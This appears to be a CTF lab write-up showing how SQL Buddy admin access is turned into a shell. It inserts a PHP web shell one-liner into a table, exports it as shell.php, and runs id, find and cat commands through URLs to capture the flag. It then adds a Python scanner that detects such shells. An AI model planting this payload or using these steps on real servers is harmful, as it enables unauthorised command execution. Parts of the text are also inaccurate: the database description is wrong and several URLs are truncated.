Project Document
TOPIC NAME: MYSQL-WEB TO SHELL
CTF.live:
CTF stands for Capture The Flag. A CTF is about hacking a deliberately
insecure system that has intentionally been left vulnerable. It is a game in which
players put their skills into practice to solve problems or break into an
opponent's system. Below are the different types of CTFs:
Jeopardy style: In this variant, players solve certain problems to acquire
"flags" (a specific string of text) to win.
Attack-Defence: In this type, two teams are created: a Red Team (which tries
to breach the system) and a Blue Team (which tries to defend the system).
Scenario:
An attacker might gain administrative access to a web application. However,
this does not automatically mean that the web server can be compromised. In
some cases a SaaS application is made available to users. Software as
a service (SaaS) is a software distribution model in which a third-party
provider hosts applications and makes them available to customers over the
Internet, and it is routine to give each user admin access to his own instance
of the web application.
to figure out how to exploit the administrative interface to get a shell on the
server. In some cases, it might be possible to do privilege escalation as
well. The following username and password may be used to explore the
application and/or find a vulnerability which might require authenticated
access:
Username - Password
root - <BLANK or NO PASSWORD>
Objective: In this challenge, the attacker has administrative access to the
web application and needs to find the flag and exploit the vulnerability.
Procedure:
Open CTF.live and sign in with your Google account. It then redirects you to the
CTF.live page. Select the challenge and open it. Select a server from the
listed servers and click on the Run button. A lab link is then provided;
click on the lab link to solve the challenge.
The following procedure is required to solve the challenge: Inspect the web
application. The browser's inspect tool lets you examine the page and make
temporary changes to it, which helps in understanding how the application is built.
Search on Google for "sqlbuddy exploit" and look for publicly available
exploits. The Exploit-DB link contains the steps to be followed in order to
exploit the vulnerability. The Exploit Database is a CVE-compliant archive
of public exploits and corresponding vulnerable software, developed for use
by penetration testers and vulnerability researchers. The Exploit Database is
a repository for exploits and proof-of-concepts rather than advisories.
The Exploit Database entry for SQL Buddy consists of instructions and the PHP code
that is necessary to exploit the vulnerability.
Select the 'app' database on the left panel. (Such a database is mostly used for
unstructured data in situations where the ability of the database to accept
(create) or access (get) large amounts of data quickly is required; it offers
great flexibility with alternative data models.) Create a table 'shell'
with one column named 'shell' of type 'text': enter 'shell' in the 'Name' text field
in the 'CREATE A NEW TABLE' section, enter 'shell' in the column 'Name' text field,
select 'text' as the column type in the last section, and click on the Submit button.
Inject a PHP payload into the "shell" table: click on the "Insert" tab and
enter the PHP payload given below in the text field.
PHP Payload: <?php $output=shell_exec($_GET[2]);echo $output;?>
The shell_exec() function is an inbuilt PHP function which executes a command via
the shell and returns the complete output as a string. $_GET is used to collect
data that is sent in the URL's query string.
After inserting the PHP payload into the shell table, the data is successfully inserted
into the database as shown in the figure above. Next, the table has to be written out as
a shell.php file by using the Export option on the SQL Buddy home page.
Export the shell table to the 'shell.php' file on the web server. Select the
'CSV' (comma-separated values) option in the 'Format' section, which saves the
data in a tabular format.
Select the 'Comma' option in the 'Delimiter' section; this acts as the field
delimiter in a sequence of comma-separated values. There are then two
kinds of output in the 'Output' section: Browser and Text file. Select the
'Text file' option in the 'Output' section and specify
'shell.php' in the text field. Then click on the Submit button.
After the file has been exported successfully, a window is displayed stating
that the text file was successfully written, that you can download it
by pressing the download option if you wish, and that if this is a public
server you should delete the file from the server after downloading it.
Fig-7:window showing shell.php file was successfully uploaded.
Execute the PHP script. Click on the hyperlink that was generated after
exporting the table, or navigate to the URL given below:
URL:http://lhl087247leqkvyd14hrkl6z9.ctf-india.attackdefenselabs.com/exports/shell.ph
No output is returned because the parameter "2" was not passed. Pass
the command to be executed in parameter "2", here the command id:
URL: http://lhl087247leqkvyd14hrkl6z9.ctf-india.attackdefenselabs.com/exports/shell.php?2=id
The above URL is used to find out which user the web server is
running as: the web server runs as the www-data user. Then search for
the flag on the filesystem.
FLAG: A flag is a string of text which needs to be entered into the website
to show that you have solved the CTF.
● The command required to find the flag is:
Command: find / -name *flag*
URL: http://lhl087247leqkvyd14hrkl6z9.ctf-india.attackdefenselabs.com/exports/shell.php?2=find%20/%20-name%20*flag*
This URL is used to find the location where exactly the flag resides.
● The command required to retrieve the flag is:
Command: cat /var/www/flag-77200ece6905f486
URL: http://lhl087247leqkvyd14hrkl6z9.ctf-india.attackdefenselabs.com/exports/shell.php?2=cat%20/var/www/flag-77200ece6905f4
Fig-10: Flag retrieved.
Flag: 77200ece6905f48615cd2139090a2e96.
Conclusion: The process of exploiting the web page was carried out using
CTF.live. The flag was retrieved and verified; the verified flag shows that the
exploit was successful. Further, this kind of vulnerability and exploitation of web
pages can be avoided by using a Web Application Firewall (WAF), by
avoiding administrative privileges, and by validating inputs.
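The export step above writes whatever is in the table into a file under the web server's 'exports' directory, and the conclusion lists the mitigations. The following script is an added example, not part of this document or of SQL Buddy, that shows the defender's side of that step: it walks a web root and flags files that look like the exported web shell, i.e. PHP code that passes request-controlled input ($_GET, $_POST, ...) to a command-execution function, and any script with a server-executed extension sitting inside an export directory at all. The sample files it scans are constructed inline; the directory name 'exports' is taken from the challenge URL, and everything else (function names, severity levels) is this example's own choice.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample web root. The exports/shell.php body mirrors what the
# CSV export of the 'shell' table would contain; the other files are benign.
SAMPLE_FILES = {
    "exports/report.csv": "id,name\n1,alice\n",
    "exports/shell.php": 'shell\n"<?php $output=shell_exec($_GET[2]);echo $output;?>"\n',
    "exports/notes.txt": "plain text, nothing to see\n",
    "index.php": "<?php echo 'hello'; ?>\n",
}

# PHP functions that hand a string to the OS shell or the PHP interpreter.
EXEC_CALLS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open", "eval")
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
EXEC_RE = re.compile(r"\b(" + "|".join(EXEC_CALLS) + r")\s*\(", re.IGNORECASE)
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
# Extensions a typical PHP web server executes instead of serving as text.
SERVED_EXTS = {".php", ".phtml", ".php5", ".phar"}


def inspect_content(text):
    """Return the reasons a file's content looks like a web shell.
    An empty list means no PHP code was found at all."""
    reasons = []
    if not PHP_TAG.search(text):
        return reasons
    reasons.append("php-code")
    if EXEC_RE.search(text):
        reasons.append("exec-call")
    if REQUEST_INPUT.search(text):
        reasons.append("request-input")
    return reasons


def scan_tree(root, export_dirs=("exports",)):
    """Walk a web root and return (relative_path, reasons) for suspicious files.
    Besides content, a file with an executable extension inside an export
    directory is flagged on its own: exports should never be executable."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        reasons = inspect_content(path.read_text(errors="replace"))
        in_export_dir = any(part in export_dirs for part in rel.parts[:-1])
        if in_export_dir and path.suffix.lower() in SERVED_EXTS:
            reasons.append("executable-in-export-dir")
        if reasons:
            findings.append((rel.as_posix(), reasons))
    return findings


def severity(reasons):
    """Rank a finding: request input reaching an exec call is the web-shell pattern."""
    if {"exec-call", "request-input"} <= set(reasons):
        return "HIGH"
    if "executable-in-export-dir" in reasons or "exec-call" in reasons:
        return "MEDIUM"
    return "LOW" if reasons else "NONE"


def build_sample_tree():
    """Materialise the constructed sample files in a temporary directory."""
    tmp = Path(tempfile.mkdtemp())
    for rel, body in SAMPLE_FILES.items():
        target = tmp / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return tmp


if __name__ == "__main__":
    for rel, reasons in scan_tree(build_sample_tree()):
        print(f"{severity(reasons):6} {rel}: {', '.join(reasons)}")
```

Run against a real web root the scan reports exports/shell.php as HIGH and index.php as LOW, while the CSV and text exports are not reported. The content check is only a heuristic (obfuscated shells evade simple regexes), which is why the extension check is kept separate: the durable fix is to configure the web server so that nothing under the export directory is ever executed as PHP, and to run the export feature under an account that cannot write into the document root.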